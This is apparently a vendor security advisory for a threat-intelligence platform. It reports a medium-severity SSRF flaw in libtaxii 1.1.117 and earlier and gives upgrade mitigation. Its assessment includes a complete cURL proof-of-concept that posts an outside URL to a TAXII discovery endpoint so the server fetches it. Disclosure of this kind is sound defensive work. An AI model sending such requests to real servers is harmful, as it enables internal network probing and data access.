EIQ-2020-0012
ID |
EIQ-2020-0012 |
CVE |
|
Description |
libtaxii is vulnerable to server-side request forgery (SSRF) |
Date |
14 Oct 2020 |
Severity |
2 - MEDIUM |
CVSSv3 score |
5.3 (Snyk score) |
Status |
2.9.0 |
Assessment |
libtaxii versions 1.1.117 and earlier are vulnerable to SSRF. The libtaxii parse method wraps the lxml library; it uses the library etree module to parse data and to store hierarchical structures in the memory.
The vulnerability can be exploited on any platform instance relying on a running TAXII server. The following example uses cURL to demonstrate the exploit: curl -i -s -k -X $'POST' \ -H $'Host: 192.0.2.254' \ -H $'Connection: close' \ -H $'Accept-Encoding: gzip, deflate' \ -H $'Accept: application/xml' \ -H $'User-Agent: Cabby 0.1.20' \ -H $'X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1' \ -H $'X-TAXII-Services: urn:taxii.mitre.org:services:1.1' \ -H $'X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1' \ -H $'X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0' \ -H $'Content-Type: application/xml' \ -H $'Content-Length: 19' \ --data-binary $' http://203.0.113.255?ssrf-exploit ' \ --url $' https://192.0.2.255/taxii/discovery '
See also:
|
Mitigation |
The vulnerability has been addressed and solved in libtaxii version 1.1.118. From release 2.9.0, the platform and its OpenTAXII server component depend on libtaxii 1.1.118. For platform releases 2.8.0 and earlier, it is possible to upgrade to libtaxii 1.1.118 within the platform virtual environment. To mitigate the issue in platform instances release 2.8.0 and earlier:
|
Affected versions |
2.8.0 and earlier. |
Notes |
For more information, see: This section is not visible to users accessing the public docs, it's for internal reference See also: |
< Back to all security issues and mitigation actions
In release notes 2.9.0